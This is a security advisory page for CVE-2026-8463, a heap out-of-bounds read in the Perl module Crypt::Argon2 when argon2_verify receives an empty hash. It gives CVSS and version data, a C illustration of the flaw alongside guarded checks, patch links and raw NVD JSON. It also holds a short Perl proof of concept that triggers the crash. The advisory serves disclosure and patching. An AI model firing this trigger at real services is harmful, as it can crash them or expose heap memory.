Security Vulnerability Report
CVE-2026-8463 CVSS 5.3 MEDIUM

CVE-2026-8463

Published: 2026-05-13 14:18:17
Last Modified: 2026-05-13 19:23:39
Source: 9b29abf9-4ab0-4765-b253-1875cd9b441e

Description

Crypt::Argon2 versions from 0.017 before 0.031 for Perl perform a heap out-of-bounds read in argon2_verify on empty encoded input.

The auto-detect form of argon2_verify passes encoded_len - 1 as the length argument to memchr without checking that encoded_len is non-zero. When the encoded string is empty, the size_t subtraction underflows to SIZE_MAX and memchr scans adjacent heap memory looking for a '$' separator byte.

A caller that invokes argon2_verify against a stored hash that may legitimately be empty (for example a placeholder row or a NULL column materialised as an empty string) reads out-of-bounds heap memory, which can crash the process or leak the position of an adjacent '$' byte into subsequent parsing.
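As an added illustration (not code from Crypt::Argon2, the patch, or this advisory): the unchecked length arithmetic the description refers to, beside the guarded separator search a patched verifier and a calling application would use. The exact memchr call shape is an assumption inferred from the description, and the sample hash string is constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Assumed reconstruction of the vulnerable length computation (from the
 * advisory text, not Crypt::Argon2's source): the count handed to memchr
 * is encoded_len - 1 with no check that encoded_len is non-zero. For an
 * empty string the unsigned subtraction wraps to SIZE_MAX, so memchr would
 * scan far past the buffer. This helper only returns the wrapped value;
 * it never performs the read. */
size_t unchecked_scan_len(size_t encoded_len) {
    return encoded_len - 1;
}

/* Hardened variant: reject empty input before any length arithmetic and
 * bound the search strictly to the caller-supplied buffer. Returns the
 * byte offset of the '$' that ends the type name (9 for "$argon2id$..."),
 * or -1 when the input is empty, does not start with '$', or has no
 * second separator. */
long type_separator_offset(const char *encoded, size_t encoded_len) {
    if (encoded == NULL || encoded_len == 0 || encoded[0] != '$') {
        return -1;
    }
    /* encoded_len >= 1 here, so encoded_len - 1 cannot wrap. */
    const char *sep = memchr(encoded + 1, '$', encoded_len - 1);
    return sep == NULL ? -1 : (long)(sep - encoded);
}

/* Caller-side guard for the advisory's scenario of a stored hash column
 * that may be empty: treat such rows as "no credential set" and never
 * hand them to the verifier. Returns 1 when it is safe to verify. */
int safe_to_verify(const char *stored_hash, size_t stored_len) {
    return type_separator_offset(stored_hash, stored_len) > 0;
}

int main(void) {
    /* Constructed sample encoded hash; the parameters are illustrative. */
    const char sample[] = "$argon2id$v=19$m=65536,t=2,p=1$c2FsdA$aGFzaA";
    printf("empty input scan length wraps to SIZE_MAX: %d\n",
           unchecked_scan_len(0) == SIZE_MAX);
    printf("separator offset: %ld\n",
           type_separator_offset(sample, sizeof sample - 1));
    printf("empty row safe to verify: %d\n", safe_to_verify("", 0));
    return 0;
}
```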

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:leont:crypt\:\:argon2:*:*:*:*:*:perl:*:* - VULNERABLE
Crypt::Argon2 >= 0.017, < 0.031

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
perl
#!/usr/bin/perl
use strict;
use warnings;
# argon2_verify is not exported by default; request it explicitly.
use Crypt::Argon2 qw(argon2_verify);

# Vulnerable version: 0.017 <= v < 0.031
# This PoC demonstrates triggering the heap out-of-bounds read
# by passing an empty string to argon2_verify.

my $empty_hash = "";    # The empty input triggers the underflow

print "Attempting to verify empty hash...\n";

# This call is expected to cause a crash or abnormal behavior
# due to memchr(encoded, '$', SIZE_MAX)
eval { argon2_verify($empty_hash, "password"); };
if ($@) {
    print "Error caught: $@";
}
else {
    print "Verification returned (unexpectedly).\n";
}

References

https://github.com/Leont/crypt-argon2/commit/92eac03ce63d541e0ead7ea5a89b9b67ce0c0e64.patch (Patch)
https://metacpan.org/release/LEONT/Crypt-Argon2-0.031/changes (Release Notes)
http://www.openwall.com/lists/oss-security/2026/05/13/4 (Mailing List, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8463", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-05-13T14:18:17.140", "lastModified": "2026-05-13T19:23:38.790", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Crypt::Argon2 versions from 0.017 before 0.031 for Perl perform a heap out-of-bounds read in argon2_verify on empty encoded input.\n\nThe auto-detect form of argon2_verify passes encoded_len - 1 as the length argument to memchr without checking that encoded_len is non-zero. When the encoded string is empty, the size_t subtraction underflows to SIZE_MAX and memchr scans adjacent heap memory looking for a '$' separator byte.\n\nA caller that invokes argon2_verify against a stored hash that may legitimately be empty (for example a placeholder row or a NULL column materialised as an empty string) reads out-of-bounds heap memory, which can crash the process or leak the position of an adjacent '$' byte into subsequent parsing."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": 
"9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-126"}, {"lang": "en", "value": "CWE-191"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:leont:crypt\\:\\:argon2:*:*:*:*:*:perl:*:*", "versionStartIncluding": "0.017", "versionEndExcluding": "0.031", "matchCriteriaId": "665F8DDD-FC30-44AE-8E88-5292B014AB76"}]}]}], "references": [{"url": "https://github.com/Leont/crypt-argon2/commit/92eac03ce63d541e0ead7ea5a89b9b67ce0c0e64.patch", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Patch"]}, {"url": "https://metacpan.org/release/LEONT/Crypt-Argon2-0.031/changes", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Release Notes"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/13/4", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}